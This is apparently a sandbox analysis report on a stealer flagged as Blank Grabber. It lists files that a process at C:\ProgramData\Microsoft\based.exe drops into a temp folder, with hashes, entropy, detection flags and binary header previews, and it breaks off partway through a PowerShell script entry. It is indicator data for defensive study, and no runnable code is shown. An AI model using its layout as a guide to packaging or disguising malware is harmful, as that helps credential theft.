SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78122\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49432
Entropy (8bit):	7.811017693834739
Encrypted:	false
SSDEEP:	1536:lBEQ3cqbneddmWEADRew62fIYCVWZ7Symxs:lB53cqbn0YZaIYCVWZL
MD5:	3BD0DD2ED98FCA486EC23C42A12978A8
SHA1:	63DF559F4F1A96EB84028DC06EAEB0EF43551ACD
SHA-256:	6BEB733F2E27D25617D880559299FBEBD6A9DAC51D6A9D0AB14AE6DF9877DA07
SHA-512:	9FFA7DA0E57D98B8FD6B71BC5984118EA0B23BF11EA3F377DABB45B42F2C8757216BC38DDD05B50C0BC1C69C23754319CEF9FFC662D4199F7C7E038A0FB18254
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D......D.k....D...*...Rich+...........................PE..d...p..f.........." ...&............`d....................................................`.............................................H.................... ..,..................................................`p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59672
Entropy (8bit):	7.844480919526277
Encrypted:	false
SSDEEP:	1536:R3mH8vJHqUn5x5XOSNdirzMuIYLP2+7Syoxh:lmcUU5x5X5wrguIYLP2+i
MD5:	343E1A85DA03E0F80137719D48BABC0F
SHA1:	0702BA134B21881737585F40A5DDC9BE788BAB52
SHA-256:	7B68A4BA895D7BF605A4571D093AE3190EAC5E813A9EB131285AE74161D6D664
SHA-512:	1B29EFAD26C0A536352BF8BB176A7FE9294E616CAFB844C6D861561E59FBDA35E1F7C510B42E8ED375561A5E1D2392B42F6021ACC43133A27AE4B7006E465BA8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:e..~..~..~..w\|H.x..x..\|..x..r..x..v..x..z.....\|..5\|....5\|.x...x.}..~........x..........$..........Rich~..................PE..d...t..f.........." ...&.........p...........................................@............`.........................................H<.......9.......0..........P............<.......................................&..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109848
Entropy (8bit):	7.940033692006014
Encrypted:	false
SSDEEP:	3072:2cBkCziCnitddhSqZDd5jgejo8y04krK6p5DiIYOqgC9c:/ICiLzSCHjg95Zy9DHCK
MD5:	8B623D42698BF8A7602243B4BE1F775D
SHA1:	F9116F4786B5687A03C75D960150726843E1BC25
SHA-256:	7C2F0A65E38179170DC69E1958E7D21E552ECA46FCF62BBB842B4F951A86156C
SHA-512:	AA1B497629D7E57B960E4B0AB1EA3C28148E2D8EBD02905E89B365F508B945A49AACFBD032792101668A32F8666F8C4EF738DE7562979B7CF89E0211614FA21A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...c..f.........." ...&.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........ .......p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.6509624792548525
Encrypted:	false
SSDEEP:	768:46bvUQL1bqnnrXTvDpovwIYOI7O5YiSyvPAAMxkEXm:3MQRbqnzSvwIYOI7k7Syuxrm
MD5:	D71DF4F6E94BEA5E57C267395AD2A172
SHA1:	5C82BCA6F2CE00C80E6FE885A651B404052AC7D0
SHA-256:	8BC92B5A6C1E1C613027C8F639CD8F9F1218FC4F7D5526CFCB9C517A2E9E14C2
SHA-512:	E794D9AE16F9A2B0C52E0F9C390D967BA3287523190D98279254126DB907BA0E5E87E5525560273798CC9F32640C33C8D9F825FF473524D91B664FE91E125549
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.@:.r.:.r.:.r.3c..>.r.<.s.8.r.<.w.6.r.<.v.2.r.<.q.9.r.U.s.8.r.qcs.8.r...s.9.r.:.s...r.U...;.r.U.r.;.r.U...;.r.U.p.;.r.Rich:.r.........PE..d......f.........." ...&.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88344
Entropy (8bit):	7.9169630929403905
Encrypted:	false
SSDEEP:	1536:hrahPO+MVHyw7e8z0RvFCbqZizJDhNvf2sAwwh0ZmHNzay0IYZ1dP7Syexg:dChw7ey0RvwqWDbvOfh0ZmmIYZ1dPf
MD5:	932147AC29C593EB9E5244B67CF389BB
SHA1:	3584FF40AB9AAC1E557A6A6009D10F6835052CDE
SHA-256:	BDE9BCCB972D356B8DE2DC49A4D21D1B2F9711BBC53C9B9F678B66F16CA4C5D3
SHA-512:	6E36B8D8C6DC57A0871F0087757749C843EE12800A451185856A959160F860402AA16821C4EA659EA43BE2C44FCDB4DF5C0F889C21440ACEB9EE1BC57373263C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MR..MR..MR..D..IR..K..OR..K..AR..K..ER..K..NR.."..NR.....OR..MR..+R.."..wR.."..LR..".j.LR.."..LR..RichMR..........PE..d......f.........." ...&. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.480704744374842
Encrypted:	false
SSDEEP:	384:R13R9VFPoCaHJ0Q8AfWmZa7gJXxjIYQU7NUHQIYiSy1pCQd8AM+o/8E9VF0NyOUF:R53PdYc0phjIYQU7A5YiSyvyAMxkEbF
MD5:	0E5997263833CE8CE8A6A0EC35982A37
SHA1:	96372353F71AAA56B32030BB5F5DD5C29B854D50
SHA-256:	0489700A866DDDFA50D6EE289F7CCA22C6DCED9FA96541B45A04DC2FFB97122E
SHA-512:	A00A667CC1BBD40BEFE747FBBC10F130DC5D03B777CBE244080498E75A952C17D80DB86AA35F37B14640ED20EF21188EA99F3945553538E61797B575297C873F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..........................PE..d...f..f.........." ...&.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44312
Entropy (8bit):	7.700849446491776
Encrypted:	false
SSDEEP:	768:MKyC5RumAPKm822kI+Ud/erhgTF0GTp0G3IYLwWFi5YiSyvlcAMxkE3:zyC5u25/eWGFG3IYLwWFA7Syt6xr
MD5:	2957B2D82521ED0198851D12ED567746
SHA1:	AD5FD781490EE9B1AD2DD03E74F0779FB5F9AFC2
SHA-256:	1E97A62F4F768FA75BAC47BBA09928D79B74D84711B6488905F8429CD46F94A2
SHA-512:	B557CF3FE6C0CC188C6ACC0A43B44F82FCF3A6454F6ED7A066D75DA21BB11E08CFA180699528C39B0075F4E79B0199BB05E57526E8617036411815AB9F406D35
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:!..~@..~@..~@..w8@.x@..x...\|@..x...s@..x...v@..x...}@......\|@..~@...@..58..y@.......@.......@....,..@.......@..Rich~@..........PE..d......f.........." ...&.p.......... m....................................................`.............................................P.......h............ ..x...........X.......................................0y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_sqlite3.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57624
Entropy (8bit):	7.833716372263874
Encrypted:	false
SSDEEP:	1536:gaNI38PtvAFUbpFPJQFh6aw3gQcIYOQGA7SyixA:ga7FA2QT6ZQjIYOQGAX
MD5:	A9D2C3CF00431D2B8C8432E8FB1FEEFD
SHA1:	1C3E2FE22E10E1E9C320C1E6F567850FD22C710C
SHA-256:	AA0611C451B897D27DD16236CE723303199C6EACFC82314F342C7338B89009F3
SHA-512:	1B5ADA1DAC2AB76F49DE5C8E74542E190455551DFD1DFE45C9CCC3EDB34276635613DBCFADD1E5F4383A0D851C6656A7840C327F64B50B234F8FDD469A02EF73
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~...~...~....0..~.......~....^..~.......~.......~.......~.......~.......~...~...........~.......~....\..~.......~..Rich.~..........................PE..d......f.........." ...&.........`.. ....p...................................0............`..........................................+..P....)....... .......................+..$................................... ...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67352
Entropy (8bit):	7.859216264746876
Encrypted:	false
SSDEEP:	1536:ZdfustCsOUkZ4DZ718l4TFCF6VKbrMIYC7tle7Sy+x7CY:ZRuWCsOjmZ7g446QAIYC7tM0CY
MD5:	E5F6BFF7A8C2CD5CB89F40376DAD6797
SHA1:	B854FD43B46A4E3390D5F9610004010E273D7F5F
SHA-256:	0F8493DE58E70F3520E21E05D78CFD6A7FCDE70D277E1874183E2A8C1D3FB7D5
SHA-512:	5B7E6421AD39A61DABD498BD0F7AA959A781BC82954DD1A74858EDFEA43BE8E3AFE3D0CACB272FA69DC897374E91EA7C0570161CDA7CC57E878B288045EE98D9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d......f.........." ...&.........@.......P...................................0............`.........................................l,..d....)....... ..........D............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1443565
Entropy (8bit):	5.590585212949354
Encrypted:	false
SSDEEP:	24576:mQR5pATG8/R5lUKdcubgAnyfbM3AOwjwhBdmzRPFaUHHd:mQR5pE/RtQ/P
MD5:	4B011F052728AE5007F9EC4E97A4F625
SHA1:	9D940561F08104618EC9E901A9CD0CD13E8B355D
SHA-256:	C88CD8549DEBC046A980B0BE3BF27956AE72DCDCF1A448E55892194752C570E6
SHA-512:	BE405D80D78A188A563086809C372C44BCD1CCAB5A472D50714F559559795A1DF49437C1712E15EB0403917C7F6CFAF872D6BB0C8E4DD67A512C2C4A5AE93055
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	121713
Entropy (8bit):	7.639981505326483
Encrypted:	false
SSDEEP:	3072:dPQCyGI/XpihbF1V5ekEnIc5U34CYqadj7PJWUkRctXhPKU66:dPehUV3Evr3JAK9tKU66
MD5:	8AFB40DB96AAD7E40E7DAF470AB53946
SHA1:	691371C492DF3AA2EDB5B74255A2378DB40086E0
SHA-256:	D0D6AEB318DEB3275E523B318B4BFC33238B2D8BBE6B38D21239685EE98466D2
SHA-512:	D182F71B89B2B432789A5DA036370D2F8B20C5DF26A450049C2AC6BF18574CF94C0841ED16C2FAB051CC96F18BE6B6F2D924459EDF089E035232D6119853969B
Malicious:	false
Preview:	PK...........XRJ..............stub-o.pyc........1.Uf_1........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1635096
Entropy (8bit):	7.95287803315892
Encrypted:	false
SSDEEP:	49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
MD5:	7F1B899D2015164AB951D04EBB91E9AC
SHA1:	1223986C8A1CBB57EF1725175986E15018CC9EAB
SHA-256:	41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
SHA-512:	CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-8.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	228120
Entropy (8bit):	7.928688904391487
Encrypted:	false
SSDEEP:	6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
MD5:	264BE59FF04E5DCD1D020F16AAB3C8CB
SHA1:	2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
SHA-256:	358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
SHA-512:	9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1713432
Entropy (8bit):	7.993772635826383
Encrypted:	true
SSDEEP:	49152:ourykeLOskGnvqFtCxkwGrZ84z4Kzov9ra:9rmLFpvqFtwkwGr74TM
MD5:	CCDBD8027F165575A66245F8E9D140DE
SHA1:	D91786422CE1F1AD35C528D1C4CD28B753A81550
SHA-256:	503CD34DAED4F6D320731B368BBD940DBAC1FF7003321A47D81D81D199CCA971
SHA-512:	870B54E4468DB682B669887AEEF1FFE496F3F69B219BDA2405AC502D2DCD67B6542DB6190EA6774ABF1DB5A7DB429CE8F6D2FC5E88363569F15CF4DF78DA2311
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oX..+9..+9..+9..-...)9..-.s.%9..-...'9..-...#9..-.../9.."A..19..`A.. 9..+9..I8..D....9..D...9..D.q.9..D...*9..Rich+9..........PE..d...O..f.........." ...&. ........E. /^.. E.................................. _...........`.........................................HO^......I^......@^......0W.p0..........(._.....................................8;^.@...........................................UPX0......E.............................UPX1..... ... E.....................@....rsrc........@^......"..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI78122\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.425924737621776
Encrypted:	false
SSDEEP:	384:zKWIzVcBuVEZhWsKZa7gJXJDNIYQG76eHQIYiSy1pCQuRWAM+o/8E9VF0NyMl+:zKLVKZhWtpZDNIYQG7H5YiSyvHAMxkEN
MD5:	E021CF8D94CC009FF79981F3472765E7
SHA1:	C43D040B0E84668F3AE86ACC5BD0DF61BE2B5374
SHA-256:	AB40BF48A6DB6A00387AECE49A03937197BC66B4450559FEEC72B6F74FC4D01E
SHA-512:	C5CA57F8E4C0983D9641412E41D18ABD16FE5868D016A5C6E780543860A9D3B37CC29065799951CB13DC49637C45E02EFB6B6FFEAF006E78D6CE2134EB902C67
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d...g..f.........." ...&.0..........`.....................................................`......................................... ...L....................`..............l.......................................p...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\sqlite3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	660248
Entropy (8bit):	7.99315829587293
Encrypted:	true
SSDEEP:	12288:BTdlyELYyNiFVhF+v4GTHxoyMnYllAuz1eRDRA8z7B/oe7zMccKNjgG:BTdlyK5oFVDQ4GGYsaejd1/oeKQjgG
MD5:	74B347668B4853771FEB47C24E7EC99B
SHA1:	21BD9CA6032F0739914429C1DB3777808E4806B0
SHA-256:	5913EB3F3D237632C2F0D6E32CA3E993A50B348033BB6E0DA8D8139D44935F9E
SHA-512:	463D8864ADA5F21A70F8DB15961A680B00EE040A41EA660432D53D0EE3CCD292E6C11C4EC52D1D848A7D846AD3CAF923CBC38535754D65BBE190E095F5ACB8C3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d......f.........." ...&.....0............................................................`..............................................#......................h.......................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302360
Entropy (8bit):	7.985785632382362
Encrypted:	false
SSDEEP:	6144:49ZYAfLNgtllsyylxgsElkuO9Mj9SMDQCaCAjEaukkCTq/kP0zqEuv2urp:zATNgtIyylKsEeuEIDNafERxuRvdrp
MD5:	BC28491251D94984C8555ED959544C11
SHA1:	964336B8C045BF8BB1F4D12DE122CFC764DF6A46
SHA-256:	F308681EF9C4BB4EA6ADAE93939466DF1B51842554758CB2D003131D7558EDD4
SHA-512:	042D072D5F73FE3CD59394FC59436167C40B4E0CF7909AFCAD1968E0980B726845F09BF23B4455176B12083A91141474E9E0B7D8475AFB0E3DE8E1E4DBAD7EC0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d...h..f.........." ...&.`.......@.......P................................................`.............................................X....................P..T.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04kwtzh4.2tt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
